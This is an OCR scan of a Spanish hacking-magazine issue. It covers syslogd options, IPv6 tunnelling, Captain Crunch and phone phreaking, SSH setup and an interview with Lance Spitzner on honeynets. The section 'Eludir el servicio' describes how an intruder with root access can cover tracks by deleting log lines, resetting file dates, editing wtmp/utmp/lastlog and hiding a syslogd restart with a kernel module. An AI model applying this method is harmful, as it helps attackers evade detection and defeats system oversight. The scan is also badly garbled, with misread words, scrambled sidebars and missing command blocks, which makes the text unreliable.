que le indica dónde tiene que escribir los ar- 
chivos de log. 

El syslogd se activa automáticamente duran- 
te la iniciación del sistema pero existe un ca- 
so en el que este daemon no se encuentra en 
ejecución y éste es cuando el sistema se en- 
cuentra en el nivel 1 de ejecución (un único 
usuario). El motivo por el cual syslogd no se 
encuentra habilitado al nivel 1 de ejecución 


es que no se encuentra activo nada que pue- 
da efectuar diálogos con él, excepto el kernel 
que posee un buffer donde son salvados los 
mensajes mientras syslogd no se encuentra 
activo. Al lanzar syslogd, éste escucha los 
programas en espera que le envíen mensa- 
jes, utilizando un particular socket UNIX: 
/dev/log, que es una especie de pipe abier- 
ta donde los programas pueden enviar 
mensajes que el daemon recibe en su otra 
extremidad, que después elabora y escribe 
en un archivo de log o envía a /dev/null. 

El programa syslogd tiene numerosas opcio- 
nes, pero ninguna se encuentra habilitada 
en modo predeterminado y la mayor parte 
podría no interesaros. Á continuación se 
enumeran algunas de las opciones de uso 
común para el syslogd: 


Opciones de utilizo 

-h Sirve para entregar los mensajes 
que syslog recibe de otros hosts a un 
host central de log (requiere -r). 


-a <socket> Si ejecutáis un daemon 
con un chroot jail de esta forma se es- 
pecifica la posición del socket de log. 
Se pueden añadir hasta 19 sockets de 
log extras. 
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(¿Que es un chroot jail? Es un simple subdi- 
rectorio de donde un determinado usuario 
no puede salir y, de esta forma, se convierte 
en su root de sistema. Como no se puede 
definir una root efectiva, esto limita los daños 
que alguien pueda hacer manipulando el 
daemon ejecutándolo como si fuese aquel 
usuario). 


-m <interval> Con este parámetro es- 
pecificaréis una especie de intervalo 
entre voces - -MARK- - en el log. El va- 
lor predefinido es de 20 minutos y con 
un simple O se puede desactivar el log 
de - -MARK- -. 


-| <hostlist> Desactiva los nombres 
largos para los hosts listados. Por 
ejemplo hostlist es una lista de host 
separada por dos puntos. 


-r Esta opción indica a syslog que pue- 
de recibir mensajes (vincula syslog a 
la puerta 514 como se encuentra defi- 
nido en /etc/services, sin este pará- 
metro syslog no se activaríc). 


-s <domainlist> Sirve para efectuar el 
strip off de los nombres de dominio 


listados, de hecho la list es una lista de 
nombres de dominio separada por 
dos puntos. 


original (ej. touch -r). 
El próximo paso será buscar los archivos de 
log presentes en otras posiciones. Para esto 
analizaremos los archivos de configuración 
del daemon de log (para las problemáticas 
relativas a la interpretación de confs os 
mandamos al manual de sistema) y utiliza- 
remos el procedimiento explicado en pre- 
cedencia para los elementos encontrados. 
Finalmente, sólo nos faltan estos “extraños” 
wimp, utmp y lastlog. Su notación es dife- 
rente a los otros archivos de texto llano y 
por este motivo se debe buscar la cadena 
de texto que se desea eliminar en el interior 
del archivo, removiendo solo ésta y dejan- 
do el resto invariado, mientras que en los 
otros el lema es eliminar toda la línea. 

En red se pueden encontrar numerosas he- 
rramientas para analizar el código fuente. 
Aquí no explicaremos cómo realizar uno, 
pero trataremos su funcionamiento, 
Sucesivamente queda analizar la posibili- 
dad que un administrador de sistema haya 
colocado logs en posiciones no listadas en 
las configuraciones, por ello no estaría de 
más utilizar programas de búsqueda de ar- 
chivos analizando su contenido. 

Se desaconseja el uso reiterativo de este sis- 
tema. Hay que considerar que los procesos 
de búsqueda aumentan notablemente la 
elaboración de la CPU y del disco duro rin- 
diendo la operación “peligrosa” si se quie- 
re permanecer bien escondido. Para la lim- 
pieza de los posibles archivos encontrados, 
siendo copias o textos generados automálti- 
camente, debería ser suficiente utilizar el ci- 
clo ya explicado. 

Una vez limpiados los archivos de log 
surge una dificultad: modificando estos 
archivos el syslogd deja de escribir en los 
archivos de output y es necesario volver a 
lanzar el daemon. Los problemas son 
dos: el primero es el hecho que reinicia- 
lizándolo escribirá en los logs la puesta 
en marcha del daemon y el segundo son 
los MARKs. 

Syslogd desde el momento en el que se 
lanza escribe en los logs un mensaje que, 
por defecto, es cada 20 minutos del tipo 
“- -MARK- - Hostname Fecha Hora etc.” y 
que se repite al infinito hasta el reinicio 
del daemon. 

Este proceso necesita ser ejecutado simultá- 
neamente para resolver cada problema al 
mismo momento. En lo referente a la escri- 


Claramente existen otras opciones, pe- 
ro sirven principalmente para el debug 
y en condiciones normales no resultan 
muy útiles. 

Existe una evolución de este servicio, llama- 
da syslog-ng. Se diferencia del precedente 
por diversas funcionalidades añadidas, por 
la posibilidad de filtrar mensajes estableci- 
dos ciertas reglas y sobretodo por el tránsi- 
to de mensajes utilizando TCP y no UDP Pa- 
ra mayor información la página del ma- 
nual del sistema responderá a cualquier 
pregunta. 


O 
>»Eludir el servicio 


Como bien se sabe, no todo es seguro al 
100% e incluso los sistemas de log pertene- 
cen a esta categoría. 

Tomemos como ejemplo el syslogd. Como 
se ha explicado anteriormente syslogd es- 
cribe sobre diferentes archivos de configu- 
ración, a saber: en aquellos situados en 
/Nar/log/ y en tres archivos wimp, utmp y 
lastlog. Estos últimos son diferentes del res- 
to y, por este motivo, deberán ser maneja- 
dos de diferente manera. Es necesario eli- 
minar de los archivos en /var/log la cade- 
na de texto por nosotros elegida y, para ha- 
cerlo, deberíamos ser súper usuario, des- 
pués crearemos un archivo temporal elimi- 
nando las líneas de log en las cuales se en- 
cuentre presente la palabra interesada, uti- 
lizando para ello por ejemplo grep, wc y 
awk, realizando la operación un número 
de veces iguales a los archivos de log pre- 
sentes en el directorio. Substituiremos los 
archivos originales con aquellos modifica- 
dos reemplazando la fecha con aquella 
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tura del reinicio, es suficiente un simple mó- 
dulo del kernel que vaya a interceptar la lla- 
mada, mientras simultáneamente un script 
va a modificar la línea de los MARKs hasta 
el reinicio del daemon, 

Éstas líneas serán modificadas tomando 
en consideración la hora en la que se ha 
ejecutado la operación, procediendo ha- 
cia atrás en función del tiempo de inter- 
valo definido para los MARKS, repitién- 
dolo para cada línea. 

Después de haber cambiado simultánea- 
mente los MARKS, cargado el módulo y 
reinicializado el daemon, podemos eli- 
minar el módulo y considerar la opera- 
ción terminada. 

Por lo que se refiere a syslog-ng el modo de 
actuar es el mismo, sólo cambia la interpre- 
tación del archivo de configuración en modo 
que sea capaz de analizar la nueva sintaxis, 
Obviamente todo esto no es tan fácil como 
puede parecer explicado en palabras, pero 
con un análisis detallado se puede realizar 
una aplicación capaz de realizar todo lo 
que ha sido explicado en esta sección. Con 
estos pasos, en el ordenador tomado en 
consideración no debería permanecer nin- 
gún rastro de una posible incursión o de un 
trabajo oculto de un administrador de siste- 
ma. 


r, 8d, 


Host: Ordenador al que se 
pueden conectar en modo más 
o menos ramificado otros 
ordenadores. 


Script: Código que puede ser 
ejecutado directamente por un 
programa sin necesidad de ser 
compilado. Este último debe 
ser capaz de interpretar el 
lenguaje en el que ha sido 
realizado el script. 
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EL NUEVO PROTOCOLO DE CONEXIÓN A INTERNET 


¡Py6: un nuevo pro 


IPv6 es un protocolo de conexión destinado a mandar a pensión el 


Qué es el IPv6? Ipvó está por 
“Internet Protocol version 6” y 
es el protocolo destinado a re- 
emplazar el actual protocolo 
sobre el que se basa Internet, 


Ñ 
C llamado IPv4. La mayor parte 


(en la práctica el 100%) de los usuarios de 


Internet utiliza IPv4, un protocolo viejo de 20 | 


años con muchos fallos de seguridad, que 
precisamente plantea la realización de un 
nuevo protocolo. El segundo y más impor- 
tante motivo del nacimiento de IPvó es la fal- 
ta de direcciones IPv4 asignables, que están 
por terminarse, pero que son necesarias para 
los nuevos ordenadores conectados a Internet. 
El IPvó actualmente coexiste con IPv4, apo- 
yándose en una red IPvó6-Over-IPv4 llama- 
da óbone, que se apoya a su vez en la ac- 
tual red de Internet IPy4, a través de un sis- 
tema de tunneling de datos IPvó que se en- 
capsulan en paquetes normales IPv4. Las 
expectativas son que, dentro de unos años, 
IPvó reemplazará completamente a IPv4. 


>»De decimal 
a exzadecimal 


La diferencia substancial entre IPvó e IPv4 
radica en la estructura de las direcciones, 
que en la vieja versión del Internet 
Protocol es en base decimal (ej. 
62.98.231.67), mientras que en la 
nueva versión es en base 16 (hexa- 
decimal). Un ejemplo de IPvó puede ser: 
2001:6b8:0:400::70c (correspondiente a 
mi IPvó actual :)). 

Veamos mejor su estructura: el nuevo IP 
está formado por 8 bloques de 16 bits ca- 
da uno. Observando el ejemplo anterior 
notaréis que los bloques no son de 8 bits 
sino de 6, en efecto son 8, pero dos blo- 
ques están definidos por 0.0 porque son 
todos ceros. La forma completa habría si- 


do 
2001:06b8:0000:0000:0400:000:000 
:070c. 

Otra forma de escritura del IPvó es la 
Nibble. Esta forma se utiliza para la re- 


gión inversa de los DNS (Domain Name 
Server). Esta forma prevé que el IP esté 
escrito en sentido inverso, cifra por cifra, 
sin contradicciones y que cada carácter 
esté separado por un punto. Hagamos 
un ejemplo, si el IP es: 
2001:6b8:0:400::70c, en la forma Nib- 
ble será 
c.0.7.0.0.0.0.0.0.0.0.0.0.0.4.0.0.0.0. 
0.0.0.0.0.8.b.6.0.1.0.0.2.ip6.int. 

Sí, es un poco larga... Son exactamente 
32 caracteres + los puntos + ipó6.int. Por 
ello, cuando debdáis escribirlo en esta for- 
ma recordad que deben haber 32 carac- 
teres. Otra novedad es que la máscara 
de red que en la v4 se utilizaba para in- 
dividuar nodos y redes desaparece y es 
substituida por un prefijo. El prefijo es 
aquella escritura que sigue al IP es decir 
/16/64/127. 

¿Para qué sirve? A indicaros cuantos !P 
os han sido asignados, o mejor dicho el 
número de bits fijos. Por ejemplo, si se os 
asigna una /128 vosotros no podéis mo- 
dificar ninguna cifra porque todas las ci- 
fras son fijas (128 bits). Si os dan una 
/120 significa que tenéis a disposición 
256 direcciones de IP ¿Cómo he obteni- 
do este número? He substraído al núme- 
ro máximo de bits el número de bits fijos, 
de esta forma 128-120=8 y esto me di- 


ce que 2 elevado a la octava potencia es | 


el número de IPs que puedo utilizar. Se 
debe considerar que el número de direc- 
ciones IPvó asignadas por los Tunnel Bro- 
ker (proveedores que ofrecen servicios de 
tunneling IPvó6-Over-OPv4 gratis) son es- 
táticos, por lo tanto se puede disfrutar de 


DNS: Domain Name Server. Es 
el sistema que permite hacer 
corresponder un cierto dominio 
con la relativa dirección |P. de 
tal manera que escribiendo el 
nombre del dominio de un 
sitio, el usuario sea conectado 
al ordenador que efectivamente 
hospeda aquel sitio. 


la comodidad de un IP estático, resol- 
viéndose en un nombre de dominio a 
través de DNS sin tener que actualizarlo 
a cada cambio de IP Los sistemas opera- 
tivos más recientes (sistemas Windows a 
partir de Win2k(SP1)) están dotados de 
soporte de tunneling IPvó-Over-IPv4 inte- 
grado. En algunas distribuciones de Linux 
para instalar el protocolo IPvé es necesa- 
rio una recopilación de kernel (para los 


| kernels monolíticos) mientras que para 


las otras se debe simplemente cargar el 
módulo relativo a IPyó (modprobe ipvé). 
Para funcionar, un túnel IPvó necesita ser 
configurado por dos lados: el servidor (el | 
Tunnel Broker) y el cliente (nuestro PC). El | 
servidor será configurado automática- 
mente por el tb (Tunnel Broker), mientras | 
que a nosotros nos toca la configuración 


| del cliente =). Para activar un túnel de 


datos IPvó6-Over-IPy4, obviamente-es ne- 
cesario estar inscrito en un Tunnel Broker, 
de los que hablábamos en precedencia. 
Existen ya Tunnel Brokers en España co- 
mo el de Wanadoo o El Mundo. Cada tb 
posee procesos de autenticación y actua- 
lización IPv4 un poco diferentes. En cual- 
quier caso, en las páginas web de los 
Tunnel Broker hay presentes How-To y 
FAQ bastante completas. Después de ha- 
berse inscrito a un tb, se debería recibir 
un mail con los datos de nuestro túnel, 
que son: Login y password. 

Nuestra dirección IPvéó (y/o nuestra 
Subnet, si nos ha sido asignada una) 
Endpoint IPv4 (es decir, el IP del Tun- | 
nel Broker) 

Endpoint IPvé (IPvó del Tunnel Broker, no 
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Lo Link encap: Local Loopback 
Inet addr: 127.0.0.1 
Mask: 225.0.0.0 


Inet6 addr: ::1/128 Scope:Host=> 


¡La línea que os interesa! Si 


obtenéis esto podéis saltar so- 


bre una pierna de alegría =) 
¡"UP LOOPBACK RUNNING 

MIU: 16436 

Metric:1 

RX packets:20 errors: 0 dropped 

0 over 

runs:0 frame:0 

TX packets:20 errors: (0 dropped 

0: overruns 0O:carrier:0 

collisions:0 Exqueuelen: 0 ? 

rxbytes: 1400 (1.3 Kb) TX 

bytes: 1400 (1.3 Kb) 


DENCIA (co) EOI aL 

Data bytes 

64 bytes from ::1: lemp_seg=0 
hops=64 time=55, usec 

64 bytes from ::1: lcmp seq=1 
hops=64 time=45 usec 

64 bytes from ::1: 1cmp. seq=2 
hops=64 ttime=44 usec 

641 bytes from ::1: emp seq=3 
hops=64 time=46 usec 

64 bytes from ::1: lomp seg=4 
hops=64 time=45 usec 


| [64 bytes from ::1: 1emp seg=5 


hops=64 time>47 usec 

64 bytes from ::L: icmp segq=6 
hops=64 tElme=42 usec 

==3:1 ping statistics == 

o packets trasmitted, 7 pae= 
kets 


| received, 0% packet loss 


round=tripmin/avg/max/mdev=> 
0,0042/0.046/0.055/0.006 ms 
[rootf localhost root / 17 


Cd/usr:/s:c/Linux 
Make menucont£1g 


Per Kemel 2.2.x seleccionar: 
Code maturity level options 

[*] Preompt. for development 

and/or 

Incomplete code/deivers 
Networking Options 

[*] Kernel /User netlink socket 
[4] Net link device emulation 

[*] The Ipv6 protocol (EXPERIMEN= 
(PAE) 

[*]Ipv6: enable EUI=64 token for= 
mat 

EX] Ipv6: disable provider based 
addresses 


Per Kernel 2.4.x seleccionar: 
Code maturity level options 

[+] Preompt for development 
and/o£ 

incomplete code/drivers 
Networ*king Options 

[+] Kernel /User netlink socket 
[4] Routing messages 

[*] The Tpvé6 protocol (BXPERTMEN= 
TAL) 
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image=/boot/bzImage6 
label=Ipvó6read-only 


root=/dev/hda2 


Professional 


Microsoft windows XP [Version 
5.1.2600] 


(C) Copyright 1985-2001 Microsoft 


Corp. 


NYDocumentsandl 


SettingsNVIP3R>ipv6 install 


Instalación en curso... Opera- | 


ción finalizada con suceso. 


De todas formas, ulterior información so- | 
bre el protocolo IPvó, sobre como insta- | 
larlo sobre otros sistemas operativos (ej.: | 
freebsd o MacOS) es posible encontrarla 

en la Web. Os envío a los siguientes | 
UNES | 


Tunnel Broker de Wanadoo 


Tunnel Broker de El Mundo 


El mejor sitio de IPv6, en inglés 


Hurricane Electric, Tunnel Broker | 
americano 


Enésimo Tunnel Broker europeo 


EL “SILBATO” QUE PINCHA LA RED TELEFÓNICA... 


A Captain 


En el primer número dedicamos como seis líneas al precursor 


W [ 
1n St 


de todos los hacker modernos: ¡un triunfo! 


De manera que hemos decidido contároslo con más profundidad. 


alias Captain 


ohn Draper, 
Crunch, fue el primer hacker, 


| que la historia recuerde. 

| Quizás no el primero en lo 
absoluto, pero sin duda, el 

más genial. La historia es 

| bastante conocida: Draper, durante los 
| años 70, encontró un silbato dentro de 
una caja de cereales, o funda de pa- 
pas según la versión, el cual emitía un 
sonido con una frecuencia que se acer- 


ra llamar a cualquier rincón del mun- 
¡do. Los cereales (o las papas, según 
| haya sido el caso), tenían un nombre 
bastante divertido, Captain Crunch, 
| que se convirtió en el sobrenombre de 
' Draper. Éste, después de haber utiliza- 
¡do la técnica del silbato, dispuso un 
¡sistema más complejo y eficaz para 
¡llamar de forma gratuita a cualquier 
| parte: el Bluebox. Un dispositivo que 
| permitía acceder a los números verdes 
¡para encauzar las llamadas en cual- 
¡quier dirección. Según las leyendas, 
¡John Draper utilizando Bluebox consi- 


¡caba a 2600 Hertz, capaz de desblo- 
quear la línea del sistema telefónico | 
americano y obtener la señal libre pa- | 


Cru 


DC 


guió, incluso, llamar al Vaticano ha- | 
ciéndose pasar por John Kissinger. Pe- | 
ro lo curioso es que en el proyecto 
' Bluebox participaron nombres destaca- 
dos del escenario informático contem- | 
' poráneo, como Steve Jobs, actual líder | 
de Apple. El único inconveniente es 
| que a John Draper siempre le ha gus- | 


tado contar sus descubrimientos, por lo | 


- que fue identificado y arrestado por el | 


FBI, mientras que sus “colegas” 
rieron permanecer ocultados en un lu- 
gar más seguro. Y efectivamente, así 
Draper continuó su vida de “gitano” de 


prefi- 


la informática mientras que sus coetá- | 
neos fueron acomodándose detrás de | 
sus escritorios de palisandro con sillón 
de piel incorporado. Participó, conjun- | 
tamente con su amigo Jobs, al naci- 


miento de Apple, desarrolló los prime- 


ros videojuegos y durante mucho tiem- 


po estuvo en la India, siguiendo la mo- 
da de la contracultura de los años 70. 
Se dice que tiene un caimán, como 


| animal doméstico, en la bañera. Cosa 
| perfectamente en línea con su estilo de | 
Las noticias más recientes de | 


vida. 
“nuestro capitán”, apuntan que está 
cerca de franquear la barricada. Pare- 


ce, en efecto, que ayudará a defender- | 
¡se de los ataques de los piratas de la | 


red a los sitios de grandes sociedades. 


| Pero el mito continúa. 
| 


Blue Box: permitía activar 


líneas telefónicas analógicas 
y efectuar llamadas gratis. 
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los códigos de control de las | 


nch: 


mo amigo 


HERRAMIENTAS 
DEL OFICIO 


El catálogo de los instrumentos 
utilizados por Crunch para 
llamar gratis es muy amplio: 
monedas de hielo, descargas 
eléctricas, magnetos, hasta la 
sofisticadísima y famosa Blue 


Box, un accesorio capaz de imitar 
Mas Sales EIpIGAS de las Líneas 


de comunicación. De esta manera 
terminó por llamar la atención del 
FBI y el capitán Crunch fue 
arrestado en los años 70. 


PHONE PHREAKING 


Con el transcurso de los años y 
con la llegada de los chips DSP el 
phone phraeking pasa por los 
ordenadores y las blue box se 
convierten en programas software 


que generan y [SAN IO EOnOS] 
deseados. Todavía hoy pueden 


detectarse 150.000 ataques a los 
teléfonos públicos sólo en Nueva 
York, mientras phone phreaker de 
todo el mundo se encuentra 
constantemente en las líneas 
para charlar. 


FUENTES 


En Ciberpunk, antología de 
textos políticos, ed. Shake, 
1990 Paul Mungo y Bryan 
Glough, Approaching Zero, 
Random house, 1992. 


COMO LUCHAR CONTRA EL  “SNIFFING” 


DE DATOS 


Conexiones 
encriptadas con 55H 


EL misterioso LoRdVicio nos guía a través 
de los meandros de Secure Shell, un modo eficaz 
de protegernos del sniffing de datos... 


no de los mayores peligros de la 
red es lo sniffing, una de las técnicas 
más usadas por los cracker para ob- 
tener username y password validos 
para acceder a los sistemas que quieren violar. 
Con la técnica de sniffing eventuales malinten- 
cionados se ponen en alerta en red e intercep- 
tan todos los paquetes en transito, en la bús- 
queda de username y password transmitidos 
en claro. Si vuestra red no es segura o queréis 
conectarse a un servidor Unix una red diversa 
de la vuestra, para evitar el peligro de lo snif- 
fing, conviene realizar conexiones encripta- 
das... Secure Shell (Ssh) es el mejor modo de 
encriptar vuestra conexión ante otros sistemas y 
poder navegar tranquilamente. Con ssh es po- 
sible efectuar el tunnelling de conexión x11 o 
de otras aplicaciones que trabajan en particu- 
lares puertas, de modo que éstas trabajen en 
modo seguro! 


Este protocolo resuelve “grandes” proble- 
mas de seguridad de protocolos TCP/IP co- 
mo spoofing: 


IP spoofing - - > falsificación de la direc- 
ción IP del remitente 

DNS spoofing - - > falsificación de la in- 
formación de DNS 

Routing spoofing - - > falsificación de la 
vía iniciada por los paquetes 


E Sshl e Ssh2 


La Ssh1 es la versión más vieja, la Ssh2 es 
una completa reescritura de la vieja versión 
pero más segura. Nosotros nos ocuparemos 
de la primera versión... 


X= = > IniclamO < - - / 


Cada host instalado en ssh posee una 
copia di llaves RSA ( un algoritmo de cripto- 
logía a llaves asimétricas) largo 1024 bit, 
una pública y una privada. Además, cada 
usuario que utiliza ssh puede opcionalmen- 
te generar una propia copia de llaves RSA. 
Durante la conexión, el servidor comunica 
al cliente dos llaves públicas: 


*una fija de 1024 bit que es la verdadera 
y propia llave del host /// 
*la otra de 768 bit que viene regenerada 


cada hora /// 


Entonces el cliente genera una secuencia 
casual de 256 bit (challange) y la codifica 
con las llaves públicas del servidor. Desde 
este momento la conexión viene criptogra- 
fiada con un algoritmo a llaves simétricas 
soportadas de ssh (IDEA, DES, 3DES, ecc..) 
y se pasa a la fase de autentificación. 
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Bnsnifer 9s= 
ir st nto, 'sea un 


¡ sofwáre o un hardware, que 
recoge la información que 
viaja,a lo largo de ¿ant red 
(network). ' 

utiliza 


Cuando un usuario prueba conectarse a 
un sistema remoto, la autentificación puede 
ser de difetente manera: 


*RhostsAuthentication 

Prevé que si el sistema del cual el usuario 
prueba la conexión venga registrado en un 
archivo /etc/hosts.equiv, /ete/ssh/shosts.equiv, 
SHOME/. rhosts, SHOME/.shosts, el acceso 
es consentido sin una password. Porque és- 
te método comporta una limitada protec- 
ción hacia los tentativos de spoofing, esto es 
descartado por default. 


* RhostsRSAAuvthentication 

Este método es la combinación entre la 
precedente y una autentificación basada en 
un sistema RSA. En práctica el acceso es 
consentido del archivo /etc/hosts.equiv , 
/etc/ssh/shosts.equiv , $HOME/.rhosts , 
$HOME/.shosts y además esta presente en 
el archivo /etc/ssh_known_hosts o también 
$HOME/. ssh/known_hosts la llave que 
identifica al cliente que esta probando la 
conexión, entonces el acceso es consentido. 


* RSAAvihénticarion 
Este método se basa en un sistema de lla- 
ves públicas y privadas Rsa. A cada usuario 
son asociadas dos llaves utilizadas para la au- 
tentificación, una pública (almacenada en el 


Server Internet que gestiona las 
solicitudes de URL de parte de los 


” DNS: Doman Name Server 
1] . : 
usuarios. Cada ISP tiene un DNS. 


archivo SHOME/.ssh/identitypub) y Una pri- 
vada — (almacenada. en el archivo 
SHOME/.ssh/identity). En fase de autentifica- 
ción el cliente provee la llave pública con la 
cual prueba la conexión. 

El server controla al interno del archivo 
SHOME/.ssh/authorized keys que esté pre- 
sente la llave enviada al cliente, en tal caso, 
envía all cliente un challenge (número casual 
encriptado, usando la llave pública del clien- 
te). El cliente descripta el challenge con la lla- 
ve privada del usuario y da comunicación al 
server, demostrando así de tener la llave pri- 
vada, así el usuario puede acceder sin la 
password, 


* Password 
Si ninguno de estos métodos antes ex- 
puestos tiene éxito, la autentificación viene 
efectuada con la petición al usuario de una 
password que también viene encriptada. 


2 Instalación y 
configuración de Ssh 
Edo» Dino 


Después de haber tratado los aspectos 
teóricos en los que se basa ssh, veamos 
como procede la instalación y configura- 
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De este modo se prueba la conexión con 
el usuario por defecto del cliente. 
Para conectarse con nuestro usuario: 


ción en nuestra linux=box. En este artículo 
utilizaremos OpenssH 
(www.openssh.com), una versión free de 
ssh, compatible con los 2 protocolos ssh] y 
ssh2. 

Para poder utilizar openshh es necesario 
haber instalado OpenSSL 
(www.openssl.com) y las librerías Zlib 
(www.gzip.org/zlib/). 


Si efectuáis la conexión tramite modem, 
tenéis la posibilidad de ser más rápidos con 
la compresión de los datos, con el siguiente 
comando: 


Con ssh es posible efectuar la transmisión 
de archivo en manera segura en la red. El 
comando para hacer esto es "scp* que fun- 
ciona en manera similar al cp de linux. Por 
ejemplo para transferir un archivo a un sis- 
tema remoto se utiliza el siguiente mensaje: 


Todos estos software están disponibles sea 
en formato RPM así como en tar.gz. Pode- 
mos instalar los paquetes con los siguientes 
comandos: 


Para. personalizar el funcionamiento de 
ssh es posible modificar algunos ficheros de 
configuración. En particular, para modificar 
las opciones del cliente ssh el fichero a mo- 
dificar es /etc/ssh/ssh_config. 

Modificando este archivo se podrá modi- 
ficar la modalidad de funcionamiento del 
cliente para todos los usuarios. Si se quiere 
personalizar el cliente para cada usuario 
bastará copiar el fichero en la home de ca- 
da uno de ellos, y más precisamente en 
S$HOME/.ssh/ssh_config procediendo des. 
pués con la modificación. 

Si se quiere modificar el funcionamiento 
del demonio sshd el fichero a modificar es 
/etc/ssh/sshd_config. Por ejemplo si se quie- 
re quitar el acceso al usuario root tramite 
ssh, basta agregar a tal ficheri la línea: 


Una vez instalado openssl y las librerías 
zlib podemos proceder a la instalación de 
openssh. Si utilizan el paquete rpm el traba- 
jo será más simple,, nosotros usaremos el 
tar.gz 


Con el comando '- - sysconfdir” declara- 
mos a ssh de utilizar como directorio para 
los archivo de instalación /etc/ssh en vez de 
aquella de default /usr/local/etc. 

Con el comando "host-key” creamos los 
host keyRSA y DSA. Llegados a este punto, 
para probarlo es suficiente lanzar el demo- 
nio sshd con el comando: 


Openssh es un instrumento muy flexible, 
para aprender a usarlo mejor se aconseja 
leer su documentación. 

Si queréis un sistema “seguro” habéis da- 
do el primer paso... Ká 


Lordvicio 
lordvicioOAhotmail.com 


Para conectarse a un sistema remoto con 
Ssh utilizamos el comando: 
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Firewall: cortafuegos. Es un conjunto 


e de software/hardware que se usa para 
da filtrar los datos de intercambio entre 
diferentes redes, con la finalidad de 
proteger un servidor de ataques a través 
de la red local o a través de Internet. 
Pa 


HJ, gracias a la valiosa colaboración de la página Security Infos 


(www.securityinfos.com), ha podido entrevistar en exclusiva a Lance Spitzner, 


creador del proyecto Honeynet htip://project.honeynet.org 
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LS: Dudo seriamente que logremos tener 
productos comerciales, serían demasiado 
complejos y costosos. Creo, sin embargo, 
que las honeynets se utilizarán para fines ¡in- 
vestigativos y de inteligencia limitando de es- 


te modo su uso a las Universidades, a los | 


órganos gubernamentales, a las ,, 
organizaciones militares y a 
grupos de investigación en el 
campo de la seguridad. Mien- 
tras las Honeynets continúen de- 
mostrando su valor, habrá siem- 
pre más organizaciones quee 
adopten y utilicen estas tecnolo-| ** 


gías. Elío 


=- 
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En esto los honeypots son Úni-L_ es e 


cos, tienen muchas variables, depende de | 


cómo los utilices. Para el “security process”, 
su valor principal consiste en reconocer los 


ataques. Ya existen muchos productos en el | 


mercado que poseen esta función como 
ManTrap, Specter, y Smoke Detector. 
Para saber todavía más acerca del valor 


de los honeypots se puede consultar la url: 


http://www.tracking-hackers.com 


CNCA 
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Les diría que no comenzaran con los ho- | 


neypots "o las honeynets, sino que empeza- 
ran entendiendo las bases. Es decir, entender 
el hardening de una máquina, el networking 
y como funciona el protocolo IP Después de 
ésto es posible meterse en tecnologías como 
los firewalls, los IDS, los honeypots y la 
encyrption. Uno de mis lugares preferidos 


para iniciarse es: 


hitp://www.linux-security.com 


El proceso de incident response de un 


' honeypot es muy diferente respecto a un 


| 


proceso normal de incident response. 


Con un honeypot que tiene como única | 
finalidad la investigación, lo que se preten= | 
de es comprender las técnicas de los ma- | 


LA 


los. Es decir cuando un honeypot se ve 


| comprometido, la fase de response con- 


siste en observar y entender que está su- 
cediendo. Después se captura todo el flu- 
jo de datos incluidos los comandos y las 
chats IRC, 

Normalmente lo hacemos en modo 


que quién compromete el honeypot man- | 
tenga el control hasta que no se han al- 


canzado uno de los dos siguientes crite- 
rios: No podemos aprender nada más 
sobre las técnicas usadas por el attacker, 


El attacker está atacando o destruyendo | 
¡otros sistemas no honeypot. Una vez que 
| el ataque se ha completado, escribimos 
un informe técnico sobre lo que efectiva- 
| mente ha sucedido. 


¡Seguramente! Nuestro equipo empezará 
pronto a trabajar en ello. Tenemos muchísi- 


| mo material que añadir. La tecnología ho- 


neynet está progresando muy rápidamente y 
imorimos de ganas de empezar!. Ká 
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| Antes, 


BIOGRAFÍA 


Lance Spitzner se 

divierte aprendiendo y 
manipulado sus 

sistemas Unix en casa. 

era oficial de 

la Fuerzas de Intervención 


¡Rápida (http: / /ww.enteract .com/- 
l 1spitz/officer.html), dónde 

| también manipulava cosas de 

| diferente naturaleza. Puedes 

| ponerte en contacto con él en: 

| lancefspitzner.net 


Su libro más conocido es: 
“Conoce a tu enemigo” donde 


l Spitzner trata la amenaza: 
| Script Kiddie. 


¡FRASE CELEBRE 

| “Mi comandante solía decirme 
| que para defenderse de un 

l enemigo, era necesario 

Í conocerlo. Éste concepto 


militar se puede aplicar 


| fácilmente al mundo de la 


seguridad en la Red” 


SCRIPT KIDDIE 


|El script kiddie es alguien que 


está buscando una intrusión 
fácil. No buscan informaciones 
concretas y tampoco buscan una 


| compañia particular. 

| Su objetivo consiste en obtener 
llos privilegios de root del modo 
| más fácil posible. Para 

l conseguirlo se concentran en un 


pequeño número de 


l vulnerabilidades, y buscan por 


toda la red. 


Í Algunos son usuarios expertos 
í capaces de crear ellos solos sus 


propios instrumentos software 
(tools) y dejan tras de si 


| sofisticadas “puertas de 
Iiservicio” (backdoors). Otros no 
l tienen ni idea de lo que están 
| haciendo y sólo saben como 


teclear “start” al prompt de los 
comandos. 4 
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